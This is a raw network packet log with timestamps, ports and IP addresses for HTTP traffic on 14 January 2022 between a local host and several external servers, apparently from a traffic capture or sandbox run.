Jan 14, 2022 00:16:08.506613970 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.506618977 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.506633997 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.506658077 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.506719112 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.507585049 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.507610083 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.507729053 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.516984940 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.517103910 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.517194033 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.517286062 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.517374039 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.517453909 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.517544031 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.517623901 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.517709970 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.517796993 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.517900944 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.517963886 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.518047094 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.518129110 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.518224955 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.518316031 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.518414974 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.518491983 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.518575907 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.518663883 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.518743992 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.518832922 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.518917084 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.518999100 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.519084930 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.519172907 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.519263983 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.519364119 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.519450903 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.519531012 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.519618988 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.519702911 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.519783020 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.519867897 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.519953012 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.520039082 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.520126104 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.520207882 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.520302057 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.520386934 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.520473003 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.520553112 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.520637989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.520725965 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.520807981 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.520900965 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.520991087 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.521066904 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.521226883 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.521589994 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.556994915 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.557501078 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.561146975 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.562304974 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.574189901 CET	49906	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:08.575710058 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.577894926 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.577936888 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.577975988 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.578011036 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.578016996 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.578056097 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.578097105 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.578116894 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.578135967 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.578172922 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.578191042 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.578211069 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.578249931 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.578285933 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.578289032 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.578300953 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.578329086 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.578366041 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.578402042 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.578403950 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.578443050 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.578479052 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.578494072 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.578510046 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.578547955 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.578551054 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.578587055 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.578629971 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.591902971 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.606647968 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.614964962 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.616461039 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.625237942 CET	80	49906	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:08.625655890 CET	49906	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:08.625746012 CET	49906	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:08.626120090 CET	49906	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:08.650383949 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.650429010 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.650465965 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.650474072 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.650505066 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.650520086 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.650943041 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.650985956 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.651027918 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.651050091 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.651063919 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.651086092 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.651104927 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.651144028 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.651177883 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.651180983 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.651218891 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.651258945 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.651288986 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.651299000 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.651303053 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.651340961 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.651377916 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.651416063 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.651437998 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.651456118 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.651493073 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.651525021 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.651530027 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.651544094 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.651567936 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.651607990 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.651626110 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.651647091 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.651684046 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.651722908 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.651721954 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.651762009 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.651798964 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.651818037 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.651837111 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.651875973 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.651896000 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.651913881 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.651932955 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.651954889 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.651990891 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.652013063 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.652036905 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.652076960 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.652091980 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.652112961 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.652152061 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.652204990 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.677889109 CET	80	49906	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:08.678061008 CET	80	49906	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:08.687022924 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.704236031 CET	80	49904	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.706829071 CET	80	49906	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:08.706924915 CET	49904	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.707076073 CET	49906	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:08.707108974 CET	49906	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:08.723845005 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.723889112 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.723931074 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.723969936 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.724003077 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.724005938 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.724045038 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.724046946 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.724077940 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.724083900 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.724123955 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.724188089 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.725012064 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.725117922 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.725157976 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.725188017 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.725198984 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.725217104 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.725239038 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.725280046 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.725300074 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.725321054 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.725359917 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.725389957 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.725399017 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.725439072 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.725476980 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.725496054 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.725517988 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.725555897 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.725588083 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.725594997 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.725610971 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.725635052 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.725671053 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.725709915 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.725713968 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.725749016 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.725786924 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.725811958 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.725825071 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.725831985 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.725894928 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.725933075 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.725954056 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.725972891 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.726011038 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.726049900 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.726087093 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.726089001 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.726128101 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.726152897 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.726166010 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.726181984 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.726205111 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.726242065 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.726264954 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.726285934 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.726325035 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.726339102 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.726362944 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.726402044 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.726417065 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.726438999 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.726483107 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.726499081 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.726506948 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.726538897 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.726578951 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.726583958 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.726617098 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.726653099 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.760015965 CET	80	49906	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:08.768296957 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.795536041 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.795591116 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.795631886 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.795675039 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.795681000 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.795712948 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.795753956 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.795773029 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.795793056 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.795804977 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.795831919 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.795886993 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.797934055 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.797990084 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.798029900 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.798065901 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.798074007 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.798113108 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.798156977 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.798188925 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.798197031 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.798213005 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.798235893 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.798274994 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.798305988 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.798315048 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.798356056 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.798392057 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.798397064 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.798435926 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.798475027 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.798475981 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.798515081 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.798552036 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.798583031 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.798592091 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.798630953 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.798662901 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.798671007 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.798683882 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.798718929 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.798742056 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.798787117 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.798810005 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.798820972 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.798851013 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.798882961 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.798890114 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.798907042 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.798921108 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.798959970 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.798990011 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.798998117 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.799036980 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.799076080 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.799105883 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.799113989 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.799117088 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.799153090 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.799190044 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.799220085 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.799228907 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.799268961 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.799290895 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.799305916 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.799345016 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.799381971 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.799401999 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.799513102 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.839731932 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.839783907 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.839865923 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.859797001 CET	49907	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:08.867216110 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.867275000 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.867316961 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.867357016 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.867360115 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.867398977 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.867433071 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.867439985 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.867480040 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.867517948 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.867546082 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.867566109 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.870728016 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.870784044 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.870826006 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.870842934 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.870863914 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.870903015 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.870923996 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.870944023 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.870984077 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.871022940 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.871042967 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.871067047 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.871104956 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.871136904 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.871145964 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.871159077 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.871185064 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.871223927 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:08.871265888 CET	80	49905	141.8.194.74	192.168.2.4
